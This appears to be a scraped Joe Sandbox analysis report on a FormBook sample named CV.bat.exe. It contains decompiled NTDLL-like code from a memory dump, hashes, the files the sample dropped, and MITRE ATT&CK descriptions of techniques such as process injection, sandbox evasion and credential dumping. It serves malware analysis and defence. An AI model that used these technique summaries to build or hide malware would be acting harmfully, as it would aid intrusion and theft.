						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E01262280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E0125FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x133b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0128B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x0127645b
0x01276463
0x0127646d
0x01276475
0x0127647a
0x0127647e
0x01276480
0x0127648c
0x01276490
0x01276495
0x01276498
0x0127649b
0x0127649f
0x012764a1
0x012b7c07
0x012b7c09
0x012b7c0c
0x00000000
0x012764a7
0x012764a7
0x012764aa
0x012b7bf7
0x012b7c00
0x00000000
0x012b7bf9
0x012b7bf9
0x012b7bf9
0x012764b0
0x012764b0
0x012764b2
0x012764b2
0x012764b3
0x012764ba
0x01276553
0x0127655e
0x01276566
0x0127656c
0x01276575
0x0127657f
0x01276585
0x01276588
0x01276588
0x012764c7
0x012764cb
0x012764ce
0x012764d3
0x012764da
0x012764e5
0x012764ed
0x012764f1
0x012764f5
0x012764f6
0x012764fa
0x01276502
0x01276503
0x01276504
0x01276507
0x0127651a
0x01276524
0x01276524
0x01276526
0x01276526
0x012764aa
0x0127652c
0x0127652d
0x0127652e
0x01276539

APIs

RtlDebugPrintTimes.NTDLL ref: 0127651A

Strings

0, xrefs: 012764E5
0, xrefs: 012764FA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 5813da73ca5d64b98a3585cd10b9e6b5fd04e97398051c54ddead023827296e0
Instruction ID: 30b582a4417d1e2ac48e61b7493a5e755a6f5d13a82f6bfda46fecb3e579c8e4
Opcode Fuzzy Hash: 5813da73ca5d64b98a3585cd10b9e6b5fd04e97398051c54ddead023827296e0
Instruction Fuzzy Hash: BB417CB16157029FD311CF28C484A6BBBE5FB88714F04462EF988DB341D771EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 012DFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E012DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0128CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E012D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E012D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x012dfdda
0x012dfde2
0x012dfde5
0x012dfdec
0x012dfdfa
0x012dfdff
0x012dfe0a
0x012dfe0f
0x012dfe17
0x012dfe1e
0x012dfe19
0x012dfe19
0x012dfe19
0x012dfe20
0x012dfe21
0x012dfe22
0x012dfe25
0x012dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012DFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012DFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012DFE2B

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9755973dc2692c324a342affc4ef7053481778fa8fd47ece74ac496acbf1182e
Instruction ID: 44578b75eefd489dd0ea1b65be253fe5a2d0157e6163d05547f4ae54bd2bf8ca
Opcode Fuzzy Hash: 9755973dc2692c324a342affc4ef7053481778fa8fd47ece74ac496acbf1182e
Instruction Fuzzy Hash: CCF0F672210202BFE7241A45DC02F33BF6AEB84B30F254314F628561D1EAA2F83087F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CV.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CV.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0l2oodl.mld.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rejx5zel.xcw.psm1

C:\Users\user\AppData\Local\Temp\f-0386u9

C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
CV.bat.exe

Function 00EBBEF8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131
threadCOMMON

Function 00EBBF08 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Function 00EB9C10 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre